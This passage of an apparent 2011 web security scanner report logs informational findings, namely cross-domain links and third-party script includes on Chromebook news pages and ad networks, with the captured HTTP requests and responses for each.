<div class="gs-title"> <a class="gs-title" href="http://mashable.com/2011/05/11/google-chrome-notebooks/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://mashable.com/" target="_blank"> http://mashable.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://crenk.com/buy-chromebook/" target="_blank">
Buy a <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://crenk.com/" target="_blank"> http://crenk.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.gizmodo.com.au/" target="_blank"> http://www.gizmodo.com.au/</a>
...[SNIP]...
13.76. http://www.stumbleupon.com/badge/embed/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /badge/embed/1/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /badge/embed/1/?url=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:30:40 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 1303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
       
   
           <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110511" type="text/css" media="screen, projection" />
       
                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110511"></script>
...[SNIP]...
13.77. http://www.stumbleupon.com/badge/embed/5/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /badge/embed/5/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /badge/embed/5/?url=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:29:14 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 1305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
       
   
           <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110511" type="text/css" media="screen, projection" />
       
                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110511"></script>
...[SNIP]...
13.78. http://www.youtube.com/embed/TVqe8ieqz10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/TVqe8ieqz10

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed/TVqe8ieqz10?rel=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=s1z-YuDnG-Y; PREF=fv=10.2.154

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:28 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: GEO=c0df1fc5fad584dccc67bc540e26ae88cwsAAAAzVVOtwdbzTcvguA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 11186
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Introducing the Chromebook</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflZITYGO.css">


</head>
<body>
<d
...[SNIP]...
<div id="watch-longform-ad-placeholder"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" height="60" width="300" /></div>
...[SNIP]...
</div>
<img class="html5-watermark html5-stop-propagation html5-icon" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="watermark">
<div class="html5-progress-bar html5-stop-propagation yt-uix-range-tooltip" data-range-tooltip-format="yt.player.VideoControls.formatTime">
...[SNIP]...
</div>


<script src="//s.ytimg.com/yt/jsbin/www-embed-vflgZmdiU.js"></script>
...[SNIP]...
14. Cross-domain script include  previous  next
There are 48 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

14.1. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7098
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:28:15 GMT
Expires: Thu, 12 May 2011 13:28:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013"></script>
...[SNIP]...
14.2. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.126265.CASALE/B5362797.34

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N6296.126265.CASALE/B5362797.34;sz=300x250;click0=http://c.casalemedia.com/c/4/1/84483/;ord=378452145 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/84483/219801/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6565

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Apr 28 10:09:16 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5362797&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=61693702&advid=2993653&sid=953446&adid='></script>
...[SNIP]...
14.3. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/abt.newsissues/newsissues_urbanlegends

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/abt.newsissues/newsissues_urbanlegends;svc=;site=urbanlegends;t=26;bt=1;bts=1;pc=1;auc=2;fd=1;fs=0;sp2=0;go=13;a=;kw=;chan=newsissues;syn=about;tile=3;af=1;r=-2;sz=336x280;u=B5CDUi2520kA1h032128;dc_ref=http%3A//urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm;ord=1B5CDUi2520kA1h032128 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7768

<html><head><title>Click Here!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><center><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights r
...[SNIP]...
<!-- Code auto-generated on Tue Apr 12 16:47:36 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
14.4. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/products/computers/laptops/article

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=728leader;tile=1;sz=728x90;ord=77720659?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6571

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Apr 21 16:01:44 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p82806590&PRAd=58779352&AR_C=41840727"></script>
...[SNIP]...
14.5. http://arstechnica.com/public/shared/scripts/ad-loader-frame.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://arstechnica.com
Path:   /public/shared/scripts/ad-loader-frame.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=78259950971696530 HTTP/1.1
Host: arstechnica.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199748606.1305051745.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199748606.420037276.1305051745.1305051745.1305051745.1; phpbb3_5qbzr_u=1; phpbb3_5qbzr_k=; phpbb3_5qbzr_sid=15183fa6ce53f5ab42a35606030e6bc4

Response

HTTP/1.1 200 OK
X-ID: .13/vm3
Vary: Accept-Encoding
Content-Type: text/html
ETag: "757018977"
Last-Modified: Wed, 11 May 2011 20:14:45 GMT
Content-Length: 1831
Server: Joost NRG/0.0.1
X-Powered-By: Rainbows and unicorns
Date: Thu, 12 May 2011 13:27:53 GMT
X-Varnish: 999515623 998541438
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.crwdcntrl.net/4/to=y%7Cp=1686%7Cout=json%7Cvar=ccauds"></script>
...[SNIP]...
14.6. http://bcp.crwdcntrl.net/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /px?Yz00MTYmcHhpZD02MDY4JnB4aWQ9NTQ3JnB4aWQ9NTc3MiZweGlkPTQ2OCZweGlkPTExMzY%3D HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6d4cb6550583e1fdb81b2fe52a3cce9a; aud=ABR4nCWRyytEcRzFvyJp5r7md927sZO9Uv4F5b3zmCkRZTbK24xSs5GFxsZGskBZ2lrYiIVHYqOUpUixUcqOMs7nLu7pnN%2F5vs3M%2Bm%2Bfx8zq2l%2BLIwXLm0Wt9v%2BlvQKrwvoE3oOg%2BaNilRpMCrwnicmMWFgWJG8SM8eCcFViHJLljoBpnBNiTetiuSPexon7pd6s3oJRQWaPgA5Bbldi%2BkK9HUF8SoP3YlmfZF0Ct89EU4JgiHqXiF%2BwAYX7ZdgFceRM18T8H0b5RJzHeY3zBpGJvG0CNrCcYOmmpTZm%2BMZSj%2BWMXjYRWwTRMm8HsBXYIWyJXgLYHJtgIVGJeo8UQnQcrpG9uHexbA8LSehsiwoxR23AWRSLrmCc2C1QaJgATuwWgRKL7MSSp4lzWIE%2BB2u%2FP3x4Tdg%3D; cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w%2Fj%2Fj9e%2BpSBgVH%2FSUZENEiMIVjg2242BoazDAz%2FgeKTvqz5z8jAIAnhWf7%2FD%2BQxLgDygIJfgDwGBiYGBq5%2FDKEC3%2FYwA3WBhaDqEAo4%2F4GM3QvUuunXTpAJ%2FxkYBRXz8GsQVDEkZOIVhEOhCqAOhbgQahuSQ4H2CvN34zAWyOAU%2BHaCGWYmmmFAlsC3U3j0yuc14ZEVFCrG752QL1qEFGgTCJCfr%2FE4XpDtL1j7X8x4BcXfzwv4PP7zGl7Zu%2FhkfzWiRLyDRQV%2BbzhYVBLy5wQ8PjH7VMGKN1kgIoVL4OdEvGHSj0%2F2x1wUfznLKnGihwJEEyzfWKxOR2QfRslZ15AcAzYHJAq0kecfw%2FH%2FDCxyhivxBKub9Ro8svIz%2BPDIeu%2FXwyNrrVuARzYQki1xyNq7LcYja84ngs9VwVfxyIaeb8QjG%2FzJGZ%2FesLP4U5S2BtjLwNhCimkIDxjTQSlH8chqa9%2FAJ6vViEc2gtsCT5ER%2FiYTn%2By9m3hklbn%2BssJlsZXiiAAAOoRJ8PtsRFK3BFJgBX8hhjFq7VHFIyvz%2FzRuhwDTSwwevW7W5%2FDolTPcgkdWWM0Sj2xoz0w89vrnn8Sj1%2BvFdXyuapTAY3Kg822UYiHQ%2BR4q38gMlW%2F3GJVvux%2BVr9OEyndqQ%2BXrLkPl66PKOx85hCpv%2BhBV%2FvcCVHlHJzT1aO43vYuq3%2FsrqrxhKypfzwuN743KtyhC848oKt%2BkHZVvcB6NfwmFr5R0AREf%2F4BRwiNrdpEaBXMA7z52EtpFUCcFLmKmhuVc9Q3UMMbn32kcxSRX6yRqWMBX8ZYaxjidfYrDnZyPl1PDAu6EXdQxZic1jJGpU6eGMQBowgth

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:09 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 597

<html><body><div><!-- Segment Pixel - ESPN NBA id 5732 - DO NOT MODIFY -->
<script src="http://ib.adnxs.com/seg?add=119482&t=1" type="text/javascript"></script>
<!-- End of Segment Pixel -->
<img s
...[SNIP]...
14.7. http://bcp.crwdcntrl.net/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6d4cb6550583e1fdb81b2fe52a3cce9a; aud=ABR4nCWRP0tCYRyFf5FEiPePf%2B5d3PoCQtBXkKDMMcxFEawlCIu6NblIQ9TSEtGiu2tDS%2BSgRuTi1BYUQi1NQkOBcp473Ifzvuec9%2Ffea2ZWeHkfmi3kPuver62b%2BStNa5qFG6bnErUpkRhLZb5BTUi8CcG%2B4J2iJgrEu4J3RvxVCHZlWW7hrJL7R1WoPhDidwq4JYb4EJK3xFex3MiSfhAyI8rylPU5bwvVE1I4nT%2BG%2F5EKG%2Bw9o1qMe43znJZ7Tp8KziKdj0x2wWJW8I8V8E%2FItXF2OM9laq7iR7Kk%2BJBLDkN8CW5ALs2NrkCM6gHOPTABh3Ru03nEYsRka%2Bzt8FeKqLJU8mn%2BmgHa7mAa; cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w9O%2FH%2B8rJqBgVH%2FSRr%2FD5AYg0fIFy1mBoazDAz%2FgeKWQIqRgeELmMcEFPjHEBzyRRu%2FAkG2vwgFk76sBymQBFJg2VCBb7tZcchiMQyofA9%2B2wS%2B7WVkYNz0aw9QhvE%2FA6OgiiEB5ynm4VfgYFFBwMpfjShWOlhUEnLjFRY0BVDtSOqABgnzd%2BMwCMhgFPh2Co%2BsfF4TPr0%2FJ%2BCJE7NPuHwM0TsRj15BoWICnv%2FZjy85%2FJiLEpbOskocMNUwZRBNsICzWJ0FoiRn3URyJtgAkCjQKqZ%2FDMf%2FM7CEhp0lkBC%2Bz8bja609qnhkA1Vi8MiG37uJRza0ZyYe2QhuC3wmv8nEIyvXKIFHVlv7BkgWOUyRIkJbowCPbFDKUXx6tRrxyCpz%2FcWX4xngbvzHwBRo%2BhA1OfxegMIPdHRC5ZveQ%2BPfRdXv%2FRVV3vk2Gh9Nv2ErKt%2FIDJVv9xiVr%2BeFxvdG5VsUofJt96PydUVR%2BTpNqHynNlS%2BSTua%2FmWofH009Qbn0fiXUMPnyCEUvvZpFdwxCZRVxiMbdgZPCmJUSrrAiBTTjEHVTCDVX5%2BC0wGQQpGNFDPDXWgw%2Buevw2vTShSzIjYH4lEd0SSFz08XPqKYpSzggMddDFyyZhcpKr4CePexEVM7QqMscBEzRdZx1TdQpJ%2Fz8XKK9HMn7KJQ%2F06K9MvUqVMWfq2TKNLPV%2FGWIv0AtwcG3g%3D%3D

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1269

<html><body><div><iframe src="http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2716&action=1"></iframe>
<img src="http://pix04.revsci.net/J10982/b3/0/3/noscrip
...[SNIP]...
<!-- "Network Pixel" c/o "Lotame", segment: 'Tech Savvy' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment&returnType=js"></script>
...[SNIP]...
14.8. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The response dynamically includes the following script from another domain:

Request

